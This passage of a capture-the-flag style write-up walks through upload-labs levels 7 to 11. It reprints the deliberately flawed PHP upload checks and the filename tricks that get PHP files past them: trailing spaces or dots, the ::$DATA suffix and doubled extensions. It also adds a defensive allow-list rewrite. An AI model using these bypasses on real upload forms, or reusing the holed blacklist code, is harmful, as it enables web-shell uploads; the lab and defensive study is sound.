<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726003427022.png" alt="在这里插入图片描述"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726003434104.png" alt="在这里插入图片描述"></p>
<h2 id="Pass-7-空格绕过"><a href="#Pass-7-空格绕过" class="headerlink" title="Pass-7-空格绕过"></a>Pass-7-Space bypass</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//strip the trailing dot from the file name</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//convert to lowercase</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//remove the string ::$DATA</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span 
class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="title function_ invoke__">rand</span>(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件不允许上传'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The file-name restrictions are already quite complete, and since the formats are all locked down, let's look at the source.<br>The source is missing the following line, so whitespace is no longer restricted:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//trim leading and trailing whitespace</span></span><br></pre></td></tr></table></figure>
<p>Craft a request whose file name ends with a space and upload it:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582610313-719923-upload-labs7-2.png" alt="img"><br>It is accepted.</p>
<p>The uploaded PHP file still cannot be executed, though, because the environment is Linux.<br>On a Windows system, Windows strips the trailing space when saving the file, so a complete .php file would end up on the server.</p>
<h2 id="Pass-8-点绕过"><a href="#Pass-8-点绕过" class="headerlink" title="Pass-8-点绕过"></a>Pass-8-Dot bypass</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//convert to lowercase</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//remove the string ::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//trim leading and trailing whitespace</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span 
class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>As the hint says, "every file type that could be parsed is locked down":<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582610912-587025-upload-labs8-1.png" alt="img"></p>
<p>Since the file names are locked down, the next idea is to add something to the name or take something away.<br>After testing characters such as <code>::$DATA</code>, <code>. .</code> and <code>.</code>, it turns out that appending <code>.</code> to the file name gets past the check.</p>
<p>Append <code>.</code> to the end of the file name:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582611226-165297-upload-labs9-1.png" alt="img"></p>
<p>As in Pass07, the php. file uploads successfully, but because this is a Linux environment it cannot be executed. Pass08 also relies on a Windows file-name quirk: when a php. file is uploaded on Windows, Windows does not allow a file name to end with <code>.</code>, so it removes the <code>.</code> automatically and the result is an executable .php file.</p>
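<p>As an added example that is not part of upload-labs or this write-up, the PHP below replaces the blacklist with an allow list and normalises the client-supplied name to a fixed point before looking at the extension, so the mixed-case, trailing-space, trailing-dot and ::$DATA variants of Pass-06 to Pass-09 and the .htaccess/.user.ini dotfiles of Pass-04/05 all fall out of the same check. ALLOWED_EXT, the two function names and the sample names are assumptions chosen for this example.</p>

```php
<?php
// Added example (not upload-labs code): an allow-list replacement for the
// blacklist in Pass-04 to Pass-09. The client name is used only to derive
// the extension; the name written to disk is generated server-side.

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Normalise the name the way the target file system would before storing it:
// drop directory parts, strip an NTFS ::$DATA stream suffix (Pass-09) and
// trailing dots / spaces (Pass-07, Pass-08). The loop runs to a fixed point so
// that stacked suffixes such as "x.php. ::$DATA" collapse completely.
function normalize_upload_name(string $name): string
{
    $name = basename(str_replace('\\', '/', $name));
    do {
        $before = $name;
        $name = preg_replace('/::\$DATA$/i', '', $name);
        $name = rtrim($name, ". \t\r\n\0\x0B");
    } while ($name !== $before);
    return $name;
}

// Returns a fresh server-side file name, or null with $reason set.
function safe_upload_name(string $clientName, ?string &$reason = null): ?string
{
    $name = normalize_upload_name($clientName);

    // Dotfiles (.htaccess, .user.ini: Pass-04/05) and empty names.
    if ($name === '' || $name[0] === '.') {
        $reason = 'dotfile or empty name';
        return null;
    }

    // Compare the extension case-insensitively (Pass-06) against an allow list,
    // so unlisted interpreters such as .php7 or .phtml are refused by default.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        $reason = "extension '$ext' not allowed";
        return null;
    }

    // Exactly one dot and a plain ASCII base name: refuses "x.php.jpg" style
    // double extensions that Apache's mod_mime may interpret from the left.
    if (!preg_match('/^[A-Za-z0-9_-]+\.[a-z0-9]+$/', strtolower($name))) {
        $reason = 'name must be <word>.<ext>';
        return null;
    }

    // Never reuse the client name on disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed inputs: the bypass names from Pass-04 to Pass-09 plus legitimate ones.
$cases = [
    'shell.pHp', 'shell.php ', 'shell.php.', 'shell.php::$DATA', 'shell.php. .',
    '.htaccess', '.user.ini', 'shell.php7', 'shell.php.jpg', 'photo.jpg', 'Photo_1.PNG',
];
foreach ($cases as $c) {
    $stored = safe_upload_name($c, $reason);
    printf("%-20s => %s\n", json_encode($c),
        $stored === null ? "rejected: $reason" : "stored as $stored");
}
// In the upload handler, call move_uploaded_file($_FILES['upload_file']['tmp_name'],
// UPLOAD_PATH . '/' . $stored) only when $stored is not null.
```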
<h2 id="Pass-9-DATA绕过"><a href="#Pass-9-DATA绕过" class="headerlink" title="Pass-9-::$DATA绕过"></a>Pass-9-::$DATA bypass</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//strip the trailing dot from the file name</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//convert to lowercase</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//trim leading and trailing whitespace</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span 
class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="title function_ invoke__">rand</span>(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Looking at the source, <code>::$DATA</code> is not restricted, so we simply try a <code>::$DATA</code> bypass.</p>
<p><code>::$DATA</code> is the default data-stream attribute of the NTFS file system (so this, too, only applies on Windows).<br>When <code>1.php::$DATA</code> is accessed, the request is for the data of <code>1.php</code> itself.</p>
<p>Upload a php file, intercept the request with Burp Suite and append <code>::$DATA</code> to the extension.<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582686434-63469-upload-labs9-2.png" alt="img"><br>The file cannot be executed in a Linux environment; it has to be uploaded on Windows.</p>
<h2 id="Pass-10-点-空格-点绕过"><a href="#Pass-10-点-空格-点绕过" class="headerlink" title="Pass-10 dot+space+dot bypass"></a>Pass-10 dot+space+dot bypass</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//remove trailing dots from the file name</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//convert to lower case</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//remove the string ::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//strip leading/trailing whitespace</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The blacklist check is lax, which allows a <code>php.php. .</code> (dot, space, dot) bypass</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//remove trailing dots from the file name</span></span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//convert to lower case</span></span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//remove the string ::$DATA</span></span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//strip leading/trailing whitespace</span></span><br></pre></td></tr></table></figure>
<p><code>php.php. .</code> (dot, space, dot) -> the trailing dot is removed, giving <code>php.php. </code> (with a trailing space) -> leading/trailing whitespace is trimmed, giving <code>php.php.</code> -> the extension <code>.</code> is not in the blacklist, so the blacklist check passes -> Windows sees that the filename ends in <code>.</code> and removes it automatically -> the file that finally lands on disk is named <code>php.php</code></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582686864-45831-upload-labs10-2.png" alt="img"><br>The uploaded file can likewise only be executed in a Windows environment; Linux cannot execute it.</p>
<h2 id="Pass-11-双写绕过"><a href="#Pass-11-双写绕过" class="headerlink" title="Pass-11 double-write bypass"></a>Pass-11 double-write bypass</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>,<span class="string">"ini"</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span 
class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>; </span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Blacklist filtering, applied only once</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br></pre></td></tr></table></figure>
<p>Because the str_ireplace call runs only once, a simple double-write bypass is enough: upload <code>test.pphphp</code>, and the file that is finally created is <code>test.php</code>.</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582687359-459777-upload-labs11-2.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582687373-982033-upload-labs11-3.png" alt="img"></p>
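<p>Pass-9, Pass-10 and Pass-11 all defeat the same pattern: a blacklist applied to a name that the file system later rewrites (trailing dots and spaces, the <code>::$DATA</code> stream suffix), or a single sanitising pass that one doubling undoes. The PHP below is an added example written for this write-up, not upload-labs code: it canonicalises the client name the way Windows/NTFS would before checking a whitelist, lets the server choose the stored name, and rejects rather than "cleans". The names <code>canonicalExtension</code>, <code>storedName</code>, <code>ALLOWED_EXT</code> and <code>selfCheck</code> are ours, and PHP 7.1 or later is assumed for the nullable return types.</p>

```php
<?php
// Added example, not upload-labs code. Whitelist extension check that first
// canonicalises the client-supplied name the way the Windows/NTFS layer would,
// so the name that is validated is the name that actually lands on disk.
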